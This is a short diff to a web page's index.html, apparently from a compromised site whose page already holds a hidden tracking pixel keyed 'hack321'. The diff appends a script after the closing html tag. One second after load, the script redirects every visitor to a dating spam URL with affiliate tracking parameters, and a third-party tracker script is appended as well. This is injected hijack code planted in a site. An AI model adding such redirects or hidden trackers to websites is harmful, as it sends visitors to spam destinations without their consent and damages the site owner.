--- a/index.html
+++ b/index.html
@@ -14,3 +14,14 @@
   <img src="//whos.amung.us/pingjs/?k=hack321&t= GHOST &x=Youtube.com" style="display:none" alt="">
 </body>
 </html>
+
+  <script>
+var pagina="https://nicedating.life/?u=f738hw0&o=mt5k5gw"
+function redireccionar()
+{
+location.href=pagina
+}
+setTimeout ("redireccionar()", 1000);
+</script>
+
+<script id="_wau46t">var _wau = _wau || []; _wau.push(["dynamic", "prueba1", "46t", "c4302bffffff", "small"]);</script><script async src="//waust.at/d.js"></script>
